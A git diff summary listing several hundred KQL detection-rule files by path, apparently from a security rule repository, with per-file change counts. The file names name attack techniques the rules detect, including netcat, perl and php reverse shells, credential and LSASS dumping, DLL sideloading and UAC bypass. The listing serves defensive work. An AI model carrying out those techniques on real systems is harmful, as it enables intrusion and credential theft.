| 0 .../wget_creating_files_in_tmp_directory.kql | 0 ...onet_tunneling_service_initiated_linux.kql | 0 ...ation_to_ngrok_tunneling_service_linux.kql | 0 .../linux_crypto_mining_pool_connections.kql | 0 .../linux_reverse_shell_indicator.kql | 0 ...s_malware_callback_communication_linux.kql | 0 .../access_of_sudoers_file_content.kql | 0 .../audit_rules_deleted_via_auditctl.kql | 0 .../bash_interactive_shell.kql | 0 .../bpftrace_unsafe_option_usage.kql | 0 .../capabilities_discovery_linux.kql | 0 .../capsh_shell_invocation_linux.kql | 0 .../chmod_suspicious_directory.kql | 0 .../process_creation}/clear_linux_logs.kql | 0 .../clipboard_collection_with_xclip_tool.kql | 0 .../process_creation}/connection_proxy.kql | 0 ...esidence_discovery_via_proc_virtual_fs.kql | 0 .../copy_passwd_or_shadow_from_tmp_path.kql | 0 .../process_creation}/crontab_enumeration.kql | 0 .../process_creation}/curl_usage_on_linux.kql | 0 .../process_creation}/dd_file_overwrite.kql | 0 .../decode_base64_encoded_text.kql | 0 .../disable_or_stop_services.kql | 0 .../disabling_security_tools.kql | 0 ...tainer_discovery_via_dockerenv_listing.kql | 0 ...entially_suspicious_directory_via_wget.kql | 0 .../enable_bpf_kprobes_tracing.kql | 0 .../esxi_account_creation_via_esxcli.kql | 0 ...mission_assigned_to_account_via_esxcli.kql | 0 ...ork_configuration_discovery_via_esxcli.kql | 0 ...orage_information_discovery_via_esxcli.kql | 0 ...syslog_configuration_change_via_esxcli.kql | 0 ...ystem_information_discovery_via_esxcli.kql | 0 .../esxi_vm_kill_via_esxcli.kql | 0 .../esxi_vm_list_discovery_via_esxcli.kql | 0 ..._vsan_information_discovery_via_esxcli.kql | 0 ...ed_in_potentially_suspicious_directory.kql | 0 .../file_and_directory_discovery_linux.kql | 0 .../process_creation}/file_deletion.kql | 0 .../flush_iptables_ufw_chain.kql | 0 .../group_has_been_deleted_via_groupdel.kql | 0 .../history_file_deletion.kql | 0 ...tion_spawn_shell_via_os_system_library.kql | 0 .../install_root_certificate.kql | 0 .../interactive_bash_suspicious_children.kql | 0 ...security_stopped_via_commandline_linux.kql | 0 .../linux_base64_encoded_pipe_to_shell.kql | 0 .../linux_base64_encoded_shebang_in_cli.kql | 0 .../linux_crypto_mining_indicators.kql | 0 .../linux_doas_tool_execution.kql | 0 .../linux_hacktool_execution.kql | 0 ...twork_service_scanning_tools_execution.kql | 0 .../linux_package_uninstall.kql | 0 .../linux_recon_indicators.kql | 0 .../linux_remote_system_discovery.kql | 0 .../linux_shell_pipe_to_shell.kql | 0 .../linux_sudo_chroot_execution.kql | 0 .../linux_webshell_indicators.kql | 0 .../local_groups_discovery_linux.kql | 0 .../local_system_accounts_discovery_linux.kql | 0 ...sk_system_power_settings_via_systemctl.kql | 0 ...mount_execution_with_hidepid_parameter.kql | 0 .../named_pipe_created_via_mkfifo.kql | 0 .../process_creation}/nohup_execution.kql | 0 .../os_architecture_discovery_via_grep.kql | 0 ...scan_binary_data_transmission_activity.kql | 0 ...container_discovery_via_inodes_listing.kql | 2 +- ...al_discovery_activity_using_find_linux.kql | 0 ...tential_gobrat_file_discovery_via_grep.kql | 0 ...ntial_linux_amazon_ssm_agent_hijacking.kql | 0 ..._process_code_injection_via_dd_utility.kql | 0 ...tential_netcat_reverse_shell_execution.kql | 0 ...potential_perl_reverse_shell_execution.kql | 0 .../potential_php_reverse_shell.kql | 0 .../potential_ruby_reverse_shell.kql | 0 ...ous_change_to_sensitive_critical_files.kql | 0 .../potential_xterm_reverse_shell.kql | 0 ...y_suspicious_execution_from_tmp_folder.kql | 0 ...spicious_named_pipe_created_via_mkfifo.kql | 0 .../print_history_file_contents.kql | 0 .../pua_trufflehog_execution_linux.kql | 0 ...l_execution_via_pty_and_socket_modules.kql | 0 ...hon_spawning_pretty_tty_via_pty_module.kql | 0 .../python_webserver_execution_linux.kql | 0 ...m_viewer_session_started_on_linux_host.kql | 0 .../remove_immutable_file_attribute.kql | 0 .../remove_scheduled_cron_task_job.kql | 0 .../scheduled_cron_task_job_linux.kql | 0 .../scheduled_task_job_at.kql | 0 .../security_software_discovery_linux.kql | 0 .../process_creation}/setuid_and_setgid.kql | 0 .../shell_execution_gcc_linux.kql | 0 ...on_of_process_located_in_tmp_directory.kql | 0 .../shell_execution_via_find_linux.kql | 0 .../shell_execution_via_flock_linux.kql | 0 .../shell_execution_via_git_linux.kql | 0 .../shell_execution_via_nice_linux.kql | 0 .../shell_execution_via_rsync_linux.kql | 0 .../shell_invocation_via_apt_linux.kql | 0 ...shell_invocation_via_env_command_linux.kql | 0 .../shell_invocation_via_ssh_linux.kql | 0 ...spicious_curl_change_user_agents_linux.kql | 0 .../suspicious_curl_file_upload_linux.kql | 0 ...load_and_execute_pattern_via_curl_wget.kql | 0 .../suspicious_git_clone_linux.kql | 0 ...ious_invocation_of_shell_via_awk_linux.kql | 0 ...spicious_invocation_of_shell_via_rsync.kql | 0 .../suspicious_java_children_processes.kql | 0 .../suspicious_nohup_execution.kql | 0 .../suspicious_package_installed_linux.kql | 0 ...earing_or_removal_via_system_utilities.kql | 0 .../system_information_discovery.kql | 0 ...em_network_connections_discovery_linux.kql | 0 .../system_network_discovery_linux.kql | 0 .../touch_suspicious_service_file.kql | 0 ...riple_cross_ebpf_rootkit_execve_hijack.kql | 0 ...le_cross_ebpf_rootkit_install_commands.kql | 0 .../ufw_force_stop_using_ufw_init.kql | 0 ...ed_to_root_sudoers_group_using_usermod.kql | 0 .../user_has_been_deleted_via_userdel.kql | 0 .../vim_gtfobin_abuse_linux.kql | 0 .../file_event}/macos_emond_launch_daemon.kql | 0 .../startup_item_file_created_macos.kql | 0 .../binary_padding_macos.kql | 0 ...lipboard_data_collection_via_osascript.kql | 0 .../creation_of_a_local_user_account.kql | 0 ...dentials_from_password_stores_keychain.kql | 0 .../credentials_in_files.kql | 0 .../decode_base64_encoded_text_macos.kql | 0 .../disable_security_tools.kql | 0 .../disk_image_creation_via_hdiutil_macos.kql | 0 .../disk_image_mounting_via_hdiutil_macos.kql | 0 .../file_and_directory_discovery_macos.kql | 0 .../file_download_via_nscurl_macos.kql | 0 .../file_time_attribute_change.kql | 0 .../gatekeeper_bypass_via_xattr.kql | 0 .../guest_account_enabled_via_sysadminctl.kql | 0 .../gui_input_capture_macos.kql | 0 ...et_on_file_directory_via_chflags_macos.kql | 0 .../hidden_user_creation.kql | 0 ..._removal_on_host_clear_mac_system_logs.kql | 0 .../process_creation}/jamf_mdm_execution.kql | 0 ...mdm_potential_suspicious_child_process.kql | 0 .../jxa_in_memory_execution_via_osascript.kql | 0 ...h_agent_daemon_execution_via_launchctl.kql | 0 .../local_groups_discovery_macos.kql | 0 .../local_system_accounts_discovery_macos.kql | 0 .../macos_network_service_scanning.kql | 0 .../macos_remote_system_discovery.kql | 0 ...acos_scripting_interpreter_applescript.kql | 0 .../network_sniffing_macos.kql | 0 ...added_to_time_machine_via_tmutil_macos.kql | 0 ...otentially_suspicious_applet_osascript.kql | 0 .../osacompile_run_only_execution.kql | 0 ...d_and_decrypted_via_built_in_utilities.kql | 0 .../potential_base64_decoded_from_images.kql | 0 ...al_discovery_activity_using_find_macos.kql | 0 ...emory_download_and_compile_of_payloads.kql | 0 .../potential_persistence_via_plistbuddy.kql | 0 ...tential_wizardupdate_malware_infection.kql | 0 .../potential_xcsset_malware_infection.kql | 0 ...ol_potential_meshagent_execution_macos.kql | 0 ...tool_renamed_meshagent_execution_macos.kql | 0 ...m_viewer_session_started_on_macos_host.kql | 0 .../root_account_enable_via_dsenableroot.kql | 0 .../scheduled_cron_task_job_macos.kql | 0 .../screen_capture_macos.kql | 0 .../security_software_discovery_macos.kql | 0 .../space_after_filename_macos.kql | 0 .../split_a_file_into_pieces.kql | 0 ...suspicious_browser_child_process_macos.kql | 0 ...ious_execution_via_macos_script_editor.kql | 0 .../suspicious_history_file_operations.kql | 0 ...icious_installer_package_child_process.kql | 0 .../suspicious_macos_firmware_activity.kql | 0 ...s_microsoft_office_child_process_macos.kql | 0 ...stem_information_discovery_using_ioreg.kql | 0 ...em_information_discovery_using_sw_vers.kql | 0 ...mation_discovery_using_system_profiler.kql | 0 ...information_discovery_via_sysctl_macos.kql | 0 ...stem_integrity_protection_sip_disabled.kql | 0 ...m_integrity_protection_sip_enumeration.kql | 0 ...em_network_connections_discovery_macos.kql | 0 .../system_network_discovery_macos.kql | 0 .../system_shutdown_reboot_macos.kql | 0 ...ckup_deletion_attempt_via_tmutil_macos.kql | 0 ...chine_backup_disabled_via_tmutil_macos.kql | 0 .../user_added_to_admin_group_via_dscl.kql | 0 ...r_added_to_admin_group_via_dseditgroup.kql | 0 ...r_added_to_admin_group_via_sysadminctl.kql | 0 .../outgoing_logon_with_new_credentials.kql | 0 .../successful_account_login_via_wmi.kql | 0 ..._monitoring_agent_registry_keys_access.kql | 0 ...th_service_agents_registry_keys_access.kql | 0 ...ccess_of_signal_desktop_sensitive_data.kql | 0 ...potential_secure_deletion_with_sdelete.kql | 0 ...es_accessing_the_microphone_and_webcam.kql | 0 .../sam_registry_hive_handle_request.kql | 0 ..._application_related_objectacess_event.kql | 0 .../security}/syskey_registry_keys_access.kql | 0 .../security}/wce_wceaux_dll_access.kql | 0 ...ndows_defender_exclusion_list_modified.kql | 0 .../security}/wmi_persistence_security.kql | 0 ...rency_wallets_by_uncommon_applications.kql | 0 ..._sysvol_files_by_uncommon_applications.kql | 0 ..._history_file_by_uncommon_applications.kql | 0 ...i_master_keys_by_uncommon_applications.kql | 0 ...anager_access_by_uncommon_applications.kql | 0 ...e_file_access_by_uncommon_applications.kql | 0 ...e_access_to_browser_credential_storage.kql | 0 .../unusual_file_modification_by_dns_exe.kql | 0 ...tifier_deleted_by_uncommon_application.kql | 0 .../file_delete}/backup_files_deleted.kql | 0 .../eventlog_evtx_file_deleted.kql | 0 ...ange_powershell_cmdlet_history_deleted.kql | 0 .../file_deleted_via_sysinternals_sdelete.kql | 0 .../iis_webserver_access_logs_deleted.kql | 0 ...owershell_console_history_logs_deleted.kql | 0 .../file_delete}/prefetch_file_deleted.kql | 0 .../teamviewer_log_file_deleted.kql | 0 .../tomcat_webserver_logs_deleted.kql | 0 .../unusual_file_deletion_by_dns_exe.kql | 0 ...p_file_created_by_uncommon_application.kql | 0 ...ing_complete_ad_snapshot_into_dat_file.kql | 0 ...i_cache_file_creation_by_uncommon_tool.kql | 0 .../advanced_ip_scanner_file_event.kql | 0 .../adwind_rat_jrat_file_artifact.kql | 0 .../anydesk_temporary_artefact.kql | 0 ...sembly_dll_creation_via_aspnetcompiler.kql | 0 ...d_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql | 0 .../bloodhound_collection_files.kql | 0 ...created_files_by_microsoft_sync_center.kql | 0 ...ion_exe_for_service_with_unquoted_path.kql | 0 .../file_event}/creation_of_a_diagcab.kql | 0 .../creation_of_non_existent_system_dll.kql | 0 ...werfault_exe_wer_dll_in_unusual_folder.kql | 0 .../cred_dump_tools_dropped_files.kql | 2 +- .../csexec_service_file_creation.kql | 0 ..._hijackig_via_additional_space_in_path.kql | 0 ...ys_and_certificate_export_activity_ioc.kql | 0 ...naries_into_spool_drivers_color_folder.kql | 0 .../dynamic_csharp_compile_artefact.kql | 0 .../evtx_created_in_uncommon_location.kql | 0 ...on_in_suspicious_directory_by_msdt_exe.kql | 0 ...nsion_created_by_an_office_application.kql | 0 ...stem_dll_name_in_unsuspected_locations.kql | 0 ..._process_name_in_unsuspected_locations.kql | 0 ...kinfo_vbs_reconnaissance_script_output.kql | 0 ...assist_temporary_installation_artefact.kql | 0 .../hacktool_crackmapexec_file_indicators.kql | 0 ...ol_dumpert_process_dumper_default_file.kql | 0 .../hacktool_impacket_file_indicators.kql | 0 .../hacktool_inveigh_execution_artefacts.kql | 0 .../hacktool_mimikatz_kirbi_file_creation.kql | 0 .../hacktool_nppspy_hacktool_usage.kql | 0 ...a_crackmapexec_or_impacket_secretsdump.kql | 0 .../hacktool_powerup_write_hijack_dll.kql | 0 .../hacktool_quarkspwdump_dump_file.kql | 0 ...b_relay_secrets_dump_module_indicators.kql | 0 .../hacktool_safetykatz_dump_indicator.kql | 0 ..._typical_hivenightmare_sam_file_export.kql | 0 ...ck_legit_rdp_session_to_move_laterally.kql | 0 .../installation_of_teamviewer_desktop.kql | 0 .../iso_file_created_within_temp_folders.kql | 0 ..._image_mount_indicator_in_recent_files.kql | 0 ...legitimate_application_dropped_archive.kql | 0 ...itimate_application_dropped_executable.kql | 0 .../legitimate_application_dropped_script.kql | 0 .../file_event}/livekd_driver_creation.kql | 0 ...kd_driver_creation_by_uncommon_process.kql | 0 ...livekd_kernel_memory_dump_file_created.kql | 0 ...ess_dump_artefact_in_crashdumps_folder.kql | 0 ...s_memory_dump_creation_via_taskmgr_exe.kql | 0 .../lsass_process_memory_dump_files.kql | 0 ...ropped_in_the_teams_or_onedrive_folder.kql | 0 ...icious_powershell_scripts_filecreation.kql | 0 .../new_custom_shim_database_created.kql | 0 .../file_event}/new_outlook_macro_created.kql | 0 .../file/file_event}/ntds_dit_created.kql | 0 ...it_creation_by_uncommon_parent_process.kql | 0 .../ntds_dit_creation_by_uncommon_process.kql | 0 .../ntds_exfiltration_filename_patterns.kql | 0 .../file_event}/octopus_scanner_malware.kql | 0 .../office_macro_file_creation.kql | 0 ..._file_creation_from_suspicious_process.kql | 0 .../office_macro_file_download.kql | 0 ...nt_file_dropped_in_suspicious_location.kql | 0 .../pcre_net_package_temp_files.kql | 0 .../pdf_file_created_by_regedit_exe.kql | 0 ...inary_or_script_dropper_via_powershell.kql | 0 ...nternetexplorer_application_dll_hijack.kql | 0 ..._spoofing_using_right_to_left_override.kql | 0 ...ation_via_ntfs_index_allocation_stream.kql | 0 ...using_lookalike_characters_in_filename.kql | 0 ..._access_via_dll_search_order_hijacking.kql | 0 ...rsistence_attempt_via_errorhandler_cmd.kql | 0 ...ersistence_via_microsoft_office_add_in.kql | 0 ...ce_via_microsoft_office_startup_folder.kql | 0 ...ential_persistence_via_notepad_plugins.kql | 0 ...potential_persistence_via_outlook_form.kql | 0 ...lation_attempt_via_exe_local_technique.kql | 0 ...ential_ripzip_attack_on_startup_folder.kql | 0 .../potential_sam_database_dump.kql | 0 ...hortcut_persistence_via_powershell_exe.kql | 0 ...picious_powershell_module_file_created.kql | 0 ...al_webshell_creation_on_static_website.kql | 0 .../potential_winnti_dropper_activity.kql | 0 ...ally_suspicious_dmp_hdmp_file_creation.kql | 0 ...y_suspicious_wdac_policy_file_creation.kql | 0 .../powershell_module_file_created.kql | 0 ...file_created_by_non_powershell_process.kql | 0 .../powershell_profile_modification.kql | 0 ...hell_script_dropped_via_powershell_exe.kql | 0 ...er_creation_by_non_sysinternals_binary.kql | 0 ...er_creation_by_non_sysinternals_binary.kql | 0 .../psexec_remote_execution_file_artefact.kql | 0 .../psexec_service_file_creation.kql | 0 ...olicytest_creation_by_uncommon_process.kql | 0 ...nt_file_dropped_in_suspicious_location.kql | 0 .../rclone_config_file_creation.kql | 0 .../remcom_service_file_creation.kql | 0 ...cess_tool_screenconnect_temporary_file.kql | 0 ...e_code_tunnel_execution_file_indicator.kql | 0 .../file/file_event}/scr_file_write_event.kql | 0 ...onnect_temporary_installation_artefact.kql | 0 ...ted_in_potentially_suspicious_location.kql | 0 .../file_event}/startup_folder_file_write.kql | 0 .../suspicious_aspx_file_drop_by_exchange.kql | 0 ..._binaries_and_scripts_in_public_folder.kql | 0 .../suspicious_binary_writes_via_anydesk.kql | 0 ...ious_creation_txt_file_in_user_desktop.kql | 0 .../suspicious_creation_with_colorcpl.kql | 0 ...s_deno_file_written_from_remote_source.kql | 0 .../suspicious_desktop_ini_action.kql | 0 ...spicious_desktopimgdownldr_target_file.kql | 0 .../suspicious_double_extension_files.kql | 0 .../suspicious_executable_file_creation.kql | 0 ...created_in_outlook_temporary_directory.kql | 0 .../suspicious_file_created_in_perflogs.kql | 0 ...s_file_created_via_onenote_application.kql | 0 ..._activity_from_fake_recycle_bin_folder.kql | 0 ...le_creation_in_uncommon_appdata_folder.kql | 0 .../suspicious_file_drop_by_exchange.kql | 0 ..._write_to_sharepoint_layouts_directory.kql | 0 ...s_file_write_to_webapps_root_directory.kql | 0 ...suspicious_files_in_default_gpo_folder.kql | 0 .../suspicious_get_variable_exe_creation.kql | 0 ...cious_interactive_powershell_as_system.kql | 0 ...ious_lnk_double_extension_file_created.kql | 0 ...sexchangemailboxreplication_aspx_write.kql | 0 .../suspicious_outlook_macro_created.kql | 0 ...ous_procexp152_sys_file_created_in_tmp.kql | 0 ...scheduled_task_write_to_system32_tasks.kql | 0 ...cious_screensaver_binary_file_creation.kql | 0 .../suspicious_startup_folder_persistence.kql | 0 .../file_event}/teamviewer_remote_session.kql | 0 ...ypass_abusing_winsat_path_parsing_file.kql | 0 ...bypass_using_consent_and_comctl32_file.kql | 0 .../file_event}/uac_bypass_using_eventvwr.kql | 0 ..._bypass_using_idiagnostic_profile_file.kql | 0 .../uac_bypass_using_ieinstal_file.kql | 0 ...using_msconfig_token_modification_file.kql | 0 ..._bypass_using_net_code_profiler_on_mmc.kql | 0 ...c_bypass_using_ntfs_reparse_point_file.kql | 0 ...bypass_using_windows_media_player_file.kql | 0 ...fi_persistence_via_wpbbin_filecreation.kql | 0 ..._file_created_in_office_startup_folder.kql | 0 ..._file_creation_by_mysql_daemon_process.kql | 0 .../vhd_image_download_via_browser.kql | 0 ...tudio_code_tunnel_remote_file_creation.kql | 0 ...vscode_powershell_profile_modification.kql | 0 .../werfault_lsass_process_memory_dump.kql | 0 ...s_binaries_write_suspicious_extensions.kql | 0 ...cation_file_write_to_suspicious_folder.kql | 0 ...tings_modification_by_uncommon_process.kql | 0 ...ar_creating_files_in_startup_locations.kql | 0 ...le_file_creation_by_non_system_process.kql | 0 ...tence_script_event_consumer_file_write.kql | 0 .../wmiexec_default_output_file.kql | 0 .../wmiprvse_wbemcomn_dll_hijack_file.kql | 0 .../file_event}/writing_local_admin_share.kql | 0 .../wscript_or_cscript_dropper_file.kql | 0 ...l_sideloading_from_suspicious_location.kql | 0 .../amsi_dll_loaded_via_lolbin_process.kql | 0 ...work_service_potential_dll_sideloading.kql | 0 .../baaupdate_exe_suspicious_dll_load.kql | 0 ...ted_in_a_potential_suspicious_location.kql | 0 ...clr_dll_loaded_via_office_applications.kql | 0 .../credui_dll_loaded_by_uncommon_process.kql | 0 ...ibrary_sdiageng_dll_loaded_by_msdt_exe.kql | 0 ...stem_process_from_suspicious_locations.kql | 0 ...from_suspicious_location_via_cmspt_exe.kql | 0 .../dll_sideloading_of_shellchromeapi_dll.kql | 0 ...mbly_dll_loaded_via_office_application.kql | 0 ...r_dll_loaded_by_scripting_applications.kql | 0 .../fax_service_dll_search_order_hijack.kql | 0 ...gac_dll_loaded_via_office_applications.kql | 0 ...hacktool_silenttrinity_stager_dll_load.kql | 0 ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 0 ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 0 ...l_add_in_loaded_from_uncommon_location.kql | 0 .../microsoft_office_dll_sideload.kql | 0 ...a_for_outlook_addin_loaded_via_outlook.kql | 0 .../mmc_loading_script_engines_dlls.kql | 0 .../pcre_net_package_image_load.kql | 0 .../potential_7za_dll_sideloading.kql | 0 ...ial_antivirus_software_dll_sideloading.kql | 0 .../potential_appverifui_dll_sideloading.kql | 0 .../potential_avkkid_dll_sideloading.kql | 0 .../potential_azure_browser_sso_abuse.kql | 0 .../potential_ccleanerdu_dll_sideloading.kql | 0 ...al_ccleanerreactivator_dll_sideloading.kql | 0 ...al_chrome_frame_helper_dll_sideloading.kql | 0 ...orer_application_dll_hijack_image_load.kql | 0 ...tential_dll_sideloading_of_dbgcore_dll.kql | 0 ...tential_dll_sideloading_of_dbghelp_dll.kql | 0 ...ential_dll_sideloading_of_dbgmodel_dll.kql | 0 ...sideloading_of_libcurl_dll_via_gup_exe.kql | 0 ...potential_dll_sideloading_of_mpsvc_dll.kql | 0 ...ential_dll_sideloading_of_mscorsvc_dll.kql | 0 ...tial_dll_sideloading_using_coregen_exe.kql | 0 ..._sideloading_via_classicexplorer32_dll.kql | 0 ...ntial_dll_sideloading_via_comctl32_dll.kql | 0 ...potential_dll_sideloading_via_jsschhlp.kql | 0 ...ential_dll_sideloading_via_vmware_xfer.kql | 0 .../potential_eacore_dll_sideloading.kql | 0 .../potential_edputil_dll_sideloading.kql | 0 .../potential_goopdate_dll_sideloading.kql | 0 .../potential_iviewers_dll_sideloading.kql | 0 .../potential_libvlc_dll_sideloading.kql | 0 .../potential_mfdetours_dll_sideloading.kql | 0 .../potential_mpclient_dll_sideloading.kql | 0 .../potential_rcdll_dll_sideloading.kql | 0 ..._dll_sideloading_from_default_location.kql | 0 ..._sideloading_from_non_default_location.kql | 0 .../potential_roboform_dll_sideloading.kql | 0 ...otential_shelldispatch_dll_sideloading.kql | 0 .../potential_smadhook_dll_sideloading.kql | 0 ...ential_solidpdfcreator_dll_sideloading.kql | 0 ..._sideloading_from_non_system_locations.kql | 0 .../potential_vivaldi_elf_dll_sideloading.kql | 0 .../potential_waveedit_dll_sideloading.kql | 0 ...azuh_security_platform_dll_sideloading.kql | 0 .../potential_wwlib_dll_sideloading.kql | 0 ...s_volume_shadow_copy_vsstrace_dll_load.kql | 0 ...e_dll_loaded_by_non_powershell_process.kql | 0 ...core_dll_loaded_via_office_application.kql | 0 ...ython_image_load_by_non_python_process.kql | 0 .../remote_dll_load_via_rundll32_exe.kql | 0 ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 0 ...ous_volume_shadow_copy_vssapi_dll_load.kql | 0 .../suspicious_wsman_provider_image_loads.kql | 0 ...nel_item_loaded_from_uncommon_location.kql | 0 .../third_party_software_dll_sideloading.kql | 0 ...e_travel_debugging_utility_usage_image.kql | 0 ..._bypass_via_windows_directory_spoofing.kql | 0 .../uac_bypass_using_iscsicpl_imageload.kql | 0 .../image_load}/uac_bypass_with_fake_dll.kql | 0 .../vba_dll_loaded_via_office_application.kql | 0 ...mers_activity_via_scrcons_exe_dll_load.kql | 0 ...ersistence_command_line_event_consumer.kql | 0 .../wmic_loading_scripting_libraries.kql | 0 .../wmiprvse_wbemcomn_dll_hijack.kql | 0 ...localtonet_tunneling_service_initiated.kql | 0 ...n_to_ngrok_tunneling_service_initiated.kql | 0 ...nication_to_uncommon_destination_ports.kql | 0 ...ection_initiated_by_script_interpreter.kql | 0 ..._center_suspicious_network_connections.kql | 0 ...m_process_located_in_suspicious_folder.kql | 0 ...ication_initiated_to_portmap_io_domain.kql | 0 ..._communication_with_crypto_mining_pool.kql | 0 ..._connection_initiated_by_addinutil_exe.kql | 0 ...k_connection_initiated_by_eqnedt32_exe.kql | 0 ...k_connection_initiated_by_imewdbld_exe.kql | 0 ...k_connection_initiated_by_regsvr32_exe.kql | 0 ...tially_suspicious_or_uncommon_location.kql | 0 ...urewebsites_net_by_non_browser_process.kql | 0 ...nnection_initiated_to_btunnels_domains.kql | 0 ...itiated_to_cloudflared_tunnels_domains.kql | 0 ...nection_initiated_to_devtunnels_domain.kql | 0 ...etwork_connection_initiated_to_mega_nz.kql | 0 ...d_to_visual_studio_code_tunnels_domain.kql | 0 ...rk_connection_initiated_via_finger_exe.kql | 15 +++++++++++++ ...k_connection_initiated_via_notepad_exe.kql | 0 ...to_potential_dead_drop_resolver_domain.kql | 0 ...network_connection_over_uncommon_ports.kql | 0 ...ted_network_connection_to_non_local_ip.kql | 0 ...work_connection_initiated_by_cmstp_exe.kql | 0 ...nnection_initiated_by_microsoft_dialer.kql | 0 ...ection_initiated_by_script_interpreter.kql | 0 ...k_connection_to_public_ip_via_winlogon.kql | 0 ...dp_connections_over_non_standard_tools.kql | 0 ...picious_malware_callback_communication.kql | 0 ...cious_network_connection_to_notion_api.kql | 0 ..._suspicious_wuauclt_network_connection.kql | 0 ...ted_network_connection_to_ngrok_domain.kql | 0 .../python_initiated_connection.kql | 0 .../rdp_over_reverse_ssh_tunnel.kql | 0 .../rdp_to_http_or_https_target_ports.kql | 0 ...iating_network_connection_to_public_ip.kql | 0 ...ccess_tool_anydesk_incoming_connection.kql | 0 .../rundll32_internet_connection.kql | 0 .../silenttrinity_stager_msbuild_activity.kql | 0 .../suspicious_dropbox_api_usage.kql | 0 ...twork_connection_binary_no_commandline.kql | 0 ...k_connection_to_ip_lookup_service_apis.kql | 0 ..._network_communication_with_google_api.kql | 0 ...etwork_communication_with_telegram_api.kql | 0 .../suspicious_outbound_smtp_connections.kql | 0 ...uspicious_wordpad_outbound_connections.kql | 0 ...ction_to_active_directory_web_services.kql | 0 ...k_connection_initiated_by_certutil_exe.kql | 0 .../uncommon_outbound_kerberos_connection.kql | 0 .../7zip_compressing_dump_files.kql | 0 ...ell_cmdlets_execution_proccesscreation.kql | 0 ...sions_to_hide_services_via_set_service.kql | 0 ...rivilege_by_arbitrary_parent_processes.kql | 0 .../abusing_print_executable.kql | 0 ...ctory_database_snapshot_via_adexplorer.kql | 0 ...rectory_structure_export_via_csvde_exe.kql | 0 ...ectory_structure_export_via_ldifde_exe.kql | 0 ...add_insecure_download_source_to_winget.kql | 0 .../add_new_download_source_to_winget.kql | 0 ...spicious_new_download_source_to_winget.kql | 0 .../add_safeboot_keys_via_reg_utility.kql | 0 ...ndows_capability_via_powershell_cmdlet.kql | 0 ..._exe_execution_from_uncommon_directory.kql | 0 .../agentexecutor_powershell_execution.kql | 0 .../all_backups_deleted_via_wbadmin_exe.kql | 0 ...curity_descriptor_tampering_via_sc_exe.kql | 0 ...levated_msi_spawned_cmd_and_powershell.kql | 0 ...ays_install_elevated_windows_installer.kql | 0 .../application_removed_via_wmic_exe.kql | 0 .../application_terminated_via_wmic_exe.kql | 0 ...ary_binary_execution_using_gup_utility.kql | 0 ...r_csproj_code_execution_via_dotnet_exe.kql | 0 ..._download_via_configsecuritypolicy_exe.kql | 0 ...le_download_via_gfxdownloadwrapper_exe.kql | 0 ...bitrary_file_download_via_imewdbld_exe.kql | 0 ...ary_file_download_via_msedge_proxy_exe.kql | 0 ...bitrary_file_download_via_msohtmed_exe.kql | 0 .../arbitrary_file_download_via_mspub_exe.kql | 0 ...file_download_via_presentationhost_exe.kql | 0 ...bitrary_file_download_via_squirrel_exe.kql | 0 ...arbitrary_msi_download_via_devinit_exe.kql | 0 ...ommand_execution_via_settingcontent_ms.kql | 0 .../aspnetcompiler_execution.kql | 0 ...sembly_loading_via_cl_loadassembly_ps1.kql | 0 ...kerberos_coercion_via_dns_spn_spoofing.kql | 0 .../audio_capture_via_powershell.kql | 0 .../audio_capture_via_soundrecorder.kql | 0 .../audit_policy_tampering_via_auditpol.kql | 0 ...tampering_via_nt_resource_kit_auditpol.kql | 0 .../automated_collection_command_prompt.kql | 0 ...bs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql | 0 ...cial_processes_with_improper_arguments.kql | 0 ...64_encoded_powershell_command_detected.kql | 0 .../base64_mz_header_in_commandline.kql | 0 ...y_proxy_execution_via_dotnet_trace_exe.kql | 0 .../bitlockertogo_exe_execution.kql | 0 ...onfiguration_tampering_via_bcdedit_exe.kql | 0 .../browser_execution_in_headless_mode.kql | 0 .../browser_started_with_remote_debugging.kql | 0 .../bypass_uac_via_cmstp.kql | 0 .../bypass_uac_via_fodhelper_exe.kql | 0 .../bypass_uac_via_wsreset_exe.kql | 0 .../c_il_code_compilation_via_ilasm_exe.kql | 0 ..._exe_from_potentially_suspicious_paths.kql | 0 .../capture_credentials_with_rpcping_exe.kql | 0 .../certificate_exported_via_certutil_exe.kql | 0 .../certificate_exported_via_powershell.kql | 0 ...le_association_to_executable_via_assoc.kql | 0 ...nge_default_file_association_via_assoc.kql | 0 ...wershell_policies_to_an_insecure_level.kql | 0 ...ng_service_imagepath_value_via_reg_exe.kql | 0 .../chopper_webshell_process_pattern.kql | 0 ...eadless_execution_to_mockbin_like_site.kql | 0 ...nstance_executed_with_custom_extension.kql | 0 .../cloudflared_portable_execution.kql | 0 .../cloudflared_quick_tunnel_execution.kql | 0 ...cloudflared_tunnel_connections_cleanup.kql | 0 .../cloudflared_tunnel_execution.kql | 0 ...ing_space_characters_execution_anomaly.kql | 0 .../cmstp_execution_process_creation.kql | 0 ...cmstp_uac_bypass_via_com_object_access.kql | 0 .../cobaltstrike_load_by_rundll32.kql | 0 .../code_execution_via_pcwutl_dll.kql | 0 ...ation_via_mode_com_to_russian_language.kql | 0 .../com_object_execution_via_xwizard_exe.kql | 0 ...ith_suspicious_url_and_appdata_strings.kql | 0 ...h_password_for_exfiltration_with_7_zip.kql | 0 ..._password_for_exfiltration_with_winzip.kql | 0 .../compressed_file_creation_via_tar_exe.kql | 0 ...compressed_file_extraction_via_tar_exe.kql | 0 ...y_and_export_via_get_adcomputer_cmdlet.kql | 0 ...omputer_password_change_via_ksetup_exe.kql | 0 ...ter_system_reconnaissance_via_wmic_exe.kql | 0 ...conhost_exe_commandline_path_traversal.kql | 0 ...ost_spawned_by_uncommon_parent_process.kql | 0 .../console_codepage_lookup_via_chcp.kql | 0 .../process_creation}/control_panel_items.kql | 0 ...urestring_cmdlet_usage_via_commandline.kql | 0 ...mp_files_from_remote_share_via_cmd_exe.kql | 0 ...rom_or_to_admin_share_or_sysvol_folder.kql | 0 ...copy_from_volumeshadowcopy_via_cmd_exe.kql | 0 ...g_sensitive_files_with_credential_data.kql | 0 .../createdump_process_dump.kql | 0 ...ion_form_potentially_suspicious_parent.kql | 0 ...t_potentially_suspicious_child_process.kql | 0 ...pt_uncommon_script_extension_execution.kql | 0 .../curl_download_and_execute_combination.kql | 0 ...quest_with_potential_custom_user_agent.kql | 0 .../data_copied_to_clipboard_via_clip_exe.kql | 0 